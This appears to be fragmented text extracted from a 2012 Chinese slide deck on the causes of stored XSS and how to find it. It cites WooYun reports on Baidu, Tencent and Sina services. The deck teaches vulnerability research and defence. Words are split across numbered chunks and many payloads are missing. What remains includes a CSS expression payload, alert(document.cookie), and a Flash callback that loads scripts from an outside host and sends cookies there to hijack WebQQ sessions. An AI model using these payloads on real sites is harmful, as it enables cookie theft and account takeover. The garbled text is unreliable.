存儲(chǔ)型xss成因及挖掘方法

1、存儲(chǔ)型XSS的成因及挖掘方法,USERID: Gainover (g_@live.com)GROUP: PKAV Group,2012-7-28,www.pkav.net,| www.wooyun.org,| www.toolmao.com,什么是XSS攻擊？,,攻擊者,注入惡意代碼,查看他人資料查看一篇日志查看一條留言查看一個(gè)評(píng)論查看一個(gè)問(wèn)題查看一個(gè)答案點(diǎn)開(kāi)一個(gè)鏈接點(diǎn)開(kāi)一個(gè)郵件……,惡意代碼執(zhí)行,受害者,XS

2、S模型,當(dāng)受害者變?yōu)楣粽邥r(shí)，下一輪受害者將更容易被攻擊，威力更加明顯！,用戶信息,私密信息：日志，相片，郵件,管理信息,后臺(tái)地址，管理員帳號(hào)信息甚至直接通過(guò)Ajax上傳Shell,客戶端信息,針對(duì)瀏覽器缺陷實(shí)施攻擊,突破瀏覽器的域限制,360, 傲游等瀏覽器的命令執(zhí)行,XSS,Xss蠕蟲(chóng)攻擊,DDoS攻擊,XSS攻擊可以用來(lái)做什么？,,,惡意代碼存放位置,地址欄,數(shù)據(jù)庫(kù),惡意代碼效果,用戶點(diǎn)擊惡意鏈接打開(kāi)時(shí)執(zhí)行惡意代碼，隱蔽性差,

3、http://www.wooyun.org,,,,用戶瀏覽帶有惡意代碼的"正常頁(yè)面"時(shí)觸發(fā)，隱蔽性強(qiáng),,,http://pkav.net,Non-persistent,Persistent,反射型XSS,XSS Filter,掃描器,WAF產(chǎn)品,但是危害越來(lái)越小….,但是容易被掃….,但是容易被干掉……,存儲(chǔ)型XSS,廣泛存在,,,輸出內(nèi)容,輸出未過(guò)濾,HTML-Context,JS-Context,Css-Con

4、text,輸出已過(guò)濾,Dom-Based操作,eval,innerHTML,setTimeout,setInterval,document.write,根據(jù)輸出內(nèi)容所處的位置來(lái)分類(lèi)。,經(jīng)常需要二次過(guò)濾，但程序員忽略掉了。,會(huì)自動(dòng)發(fā)生一些轉(zhuǎn)義,Flash-based XSS,其它/HTML文件,wooyun-2010-07831 (random_) 百度某分站存儲(chǔ)型XSS,惡意代碼的輸入,惡意代碼的輸出,惡意代碼的執(zhí)行

5、,,, 替換為 < >,判斷存在 ,禁止提交,wooyun-2010-09111 (gainover) 點(diǎn)點(diǎn)網(wǎng)存儲(chǔ)型XSS,JS-Context 存儲(chǔ)型XSS的利用方式:,閉合當(dāng)前腳本，然后輸入自定義內(nèi)容。,2. 根據(jù)JS上下文，構(gòu)造正確的閉合。,過(guò)濾 ,/,替換為 (網(wǎng)易郵箱),根據(jù)實(shí)際情況，進(jìn)行過(guò)濾。通常輸出是字符串，在’和"之間，過(guò)濾’,"即可,wooyun-2010-0232

6、1(Clouds) 百度貼吧存儲(chǔ)型XSS,和中的XSS一樣，過(guò)濾 ’ 和 ",而實(shí)際上，在HTML的屬性里，也是可以被執(zhí)行的！,,進(jìn)一步構(gòu)造利用代碼,還需要將&過(guò)濾為&,,通常情況下，可能會(huì)將過(guò)濾掉了，因而無(wú)法使用此方式,1. 如果未做過(guò)濾，可以用 … 的方式來(lái)調(diào)用,CSS-Context 存儲(chǔ)型XSS的利用方式:,2. 直接根據(jù)CSS上下文構(gòu)造閉合,根據(jù)CSS類(lèi)型對(duì)輸出進(jìn)行嚴(yán)格糾正例如：字體大小，

7、必須為數(shù)字，圖片地址不允許出現(xiàn)非法字符,IE 6, 7, 8,wooyun-2010-05967 (gainover, QQ空間存儲(chǔ)型XSS),wooyun-2010-01101 (呆子不開(kāi)口, 網(wǎng)易微博換膚XSS),5. http://zone.wooyun.org/content/465,除了….中可以被寫(xiě)入CSS數(shù)據(jù)之外，還有其它位置也可以：,2. ,3. @import "data:,*%7bx:expression

8、(if(!window.x)%7balert(1);window.x=1%7d)%7D";,1. ,4. XXX,,,,,,(郵箱XSS的最?lèi)?ài)),,(部分內(nèi)容參考html5sec.org),數(shù)據(jù)輸出, 我是輸出 ,,var x=$("x").value;var x=$("x").getAttribute("picurl");,var obj=eval("

9、("+x+")");$("result").innerHTML=x;,,DOM操作,,name 字段是昵稱(chēng)，我們可以自行設(shè)置！,接著我們做以下測(cè)試：,Gainover ? Gainover<iframe>,對(duì)JS熟悉一點(diǎn)的則可能想到：,于是，我們測(cè)試引號(hào)是否被過(guò)濾!,Gainover" ? Gainover",放棄？,,v

10、ar data=$("json").value;,wooyun-2010-09732 (gainover,百度首頁(yè)XSS后門(mén)),這一類(lèi)漏洞經(jīng)常出現(xiàn)的場(chǎng)景…..,點(diǎn)擊查看大圖, 點(diǎn)擊播放音樂(lè),自動(dòng)播放音樂(lè)。。,,當(dāng)用戶點(diǎn)擊查看大圖的時(shí)候，執(zhí)行的代碼往往是：,function test(){alert($("pic").getAttribute("bigpic"));$(&

11、quot;bigimage").innerHTML="";},wooyun-2010-02490 (gainover, 騰訊微博XSS),wooyun-2010-03317 (gainover,QQ郵箱音樂(lè)功能XSS),共同點(diǎn)：讀取自定義屬性，然后進(jìn)行innerHTML操作。,解決方案：在讀取屬性之后，對(duì)屬性中的特殊字符進(jìn)行二次過(guò)濾。,.innerHTML="\uXXXX" 引發(fā)的慘案

12、,wooyun-2010-08487 (gainover,騰訊WEBQQ聊天功能XSS),實(shí)際案例,大多數(shù)廠商的做法,將\替換為\\,將\替換為/,對(duì)data.name進(jìn)行二次過(guò)濾，替換 為 < >,wooyun-2010-010167 (imlonghao, 搜狐微博 XSS),,,Flash XSS,存儲(chǔ)型,反射型,,正常的存儲(chǔ)行為,圖片上傳組件，視頻播放器，音樂(lè)播放器…,,,日志HTML未過(guò)濾，或過(guò)濾

13、不嚴(yán),FLASH相冊(cè)，對(duì)加載圖片未判斷,其它一些有加載圖片功能的FLASH應(yīng)用,第三方插件,第三方應(yīng)用,sameDomain策略,常規(guī)的Flash-based存儲(chǔ)型XSS,,1. 最低級(jí)的漏洞Always && FLASH地址任何填寫(xiě),wooyun-2010-07684 (gainover, QQ空間禮物功能XSS)wooyun-2010-08354 (gainover,百度貼吧存儲(chǔ)型XSS),,2. 稍微進(jìn)化一

14、點(diǎn)…Always && FLASH地址固定 &&FLASH會(huì)調(diào)用外部圖片或SWF文件,正常的FLASH,惡意FLASH,參數(shù)?url=xxx.jpg,,讀取配置文件,xxx.jpg,,wooyun-2010-01768 (p.z, 新浪微博存儲(chǔ)型XSS)wooyun-2010-01634 (p.z, 百度i貼吧存儲(chǔ)型XSS),,3. 再次進(jìn)化一點(diǎn)…sameDomain + 同域名下反射型FLAS

15、H XSS,sameDomain策略,只允許使用同域名下的FLASH文件,無(wú)法執(zhí)行了吧～，高枕無(wú)憂,同域名下的缺陷型FLASH文件,不同域名下的惡意FLASH文件,,程序員 B,程序員 A,被惡意利用,,同域名下允許上傳FLASH文件,某黑客,wooyun-2010-03314 (gainover, QQ郵箱XSS),wooyun-2010-06103 (gainover, QQ空間存儲(chǔ)型XSS),allowscriptaccess=&

16、quot;sameDomain"allowscriptaccess 默認(rèn)屬性,,loaderInfo.parameters,xxx.swf?func = JS代碼,flashvars="func=JS代碼",App.baidu.com,百度應(yīng)用,iframe,xxx.duapp.com,iframe,App.baidu.com/xxx.swf,合法的存儲(chǔ)行為,,開(kāi)發(fā)者,developer.com,……….

17、.,黑客(本身是開(kāi)發(fā)者),攻擊,,反射型FLASH XSS,1. FLASH開(kāi)發(fā)人員缺乏安全意識(shí)(jwplayer, open flash chart, swfupload類(lèi)程序…),2. FLASH XSS 可以繞過(guò)主流瀏覽器的XSS Filter,3. 傳統(tǒng)掃描器不易掃描,WooYun-2012-07050,Wooyun-2010-07085,(新浪微博，淘寶網(wǎng)Cookies盜取),Wooyun-2010-08318(gaino

18、ver,百度應(yīng)用XSS),受害者,http://xsst.sinaapp.com/webqqbg.php,Iframe調(diào)用,http://web.qq.com/swf/FileUploader.swf?callback=(function(){function j(w){window.s=document.createElement('script');window.s.src='//xsst.sinaapp.c

19、om/'%2bw%2b'.js';document.body.appendChild(window.s)}j('jq');j('wq')})(),Flash xss,xsst.sinaapp.com/wq.js,http://xsst.sinaapp.com/getvfqq.php?cookie={Cookie數(shù)據(jù)},http://s.web2.qq.com/api/get_sel

20、f_info2,獲取vfwebqq參數(shù),http://cgi.web2.qq.com/keycgi/qqweb/newuac/set.do,設(shè)置主題,調(diào)用外部JS,獲取cookies,劫持,騰訊WEBQQ的持久劫持,Wooyun-2010-07999,1. 拿著各種XSS Vector填入到輸入處，然后看頁(yè)面是否有“執(zhí)行”,,&,3. 看功能異常，看報(bào)錯(cuò),&,,構(gòu)造利用代碼,,查明缺陷,,檢查原因,,,傳統(tǒng)輸入點(diǎn)

21、各種表單，input[text], textarea隱藏輸入點(diǎn)Input[hidden]客戶端腳本過(guò)濾,,進(jìn)一步測(cè)試,,瀏覽器調(diào)試工具 (F12),抓包工具,,,HttpwatchFiddlerCharles,4. 遭遇驗(yàn)證碼,看到一些提交的隱藏參數(shù)。,找到一個(gè)XSS點(diǎn)之后,,alert(/xss/);alert(document.cookie);,輸入點(diǎn)長(zhǎng)度限制,突破長(zhǎng)度限制,,漏洞的利用,http-only